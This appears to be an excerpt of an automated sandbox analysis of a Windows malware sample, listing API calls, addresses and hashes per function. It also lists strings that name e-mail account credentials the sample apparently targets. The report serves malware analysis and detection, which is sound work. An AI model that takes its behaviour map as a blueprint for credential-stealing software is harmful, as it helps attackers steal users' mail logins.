                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess_wmemset
                          • String ID: CA
                          • API String ID: 2773065342-1052703068
                          • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                          • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: InformationToken
                          • String ID: IDA
                          • API String ID: 4114910276-365204570
                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc
                          • String ID: s1@
                          • API String ID: 190572456-427247929
                          • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                          • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                          • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateOpenProcessQueryValue
                          • String ID:
                          • API String ID: 1425999871-0
                          • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                          • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: CheckMembershipToken
                          • String ID:
                          • API String ID: 1351025785-0
                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateDirectory
                          • String ID:
                          • API String ID: 4241100979-0
                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID:
                          • API String ID: 1721193555-0
                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                          Download Yara Rule
                          APIs
                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                          • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                          Download Yara Rule
                          APIs
                          • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                          Download Yara Rule
                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                          • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                          • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                          • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0
                          • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                          • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                          • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                          • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                          • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                          • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                          • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                          Download Yara Rule
                          APIs
                          • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID:
                          • API String ID: 1174141254-0
                          • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                          • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • closesocket.WS2_32(00404EB0), ref: 00404DEB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: closesocket
                          • String ID:
                          • API String ID: 2781271927-0
                          • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                          • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                          Download Yara Rule
                          APIs
                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                          • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                          • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                          • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                          • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                          • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                          • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                          • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                          • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                          • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040438F
                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                          • VariantInit.OLEAUT32(?), ref: 004043C4
                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                          • VariantInit.OLEAUT32(?), ref: 00404414
                          • SysAllocString.OLEAUT32(?), ref: 00404419
                          • VariantInit.OLEAUT32(?), ref: 00404431
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                          • String ID:
                          • API String ID: 1312198159-0
                          • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                          • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                          • API String ID: 0-2111798378
                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040317B Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
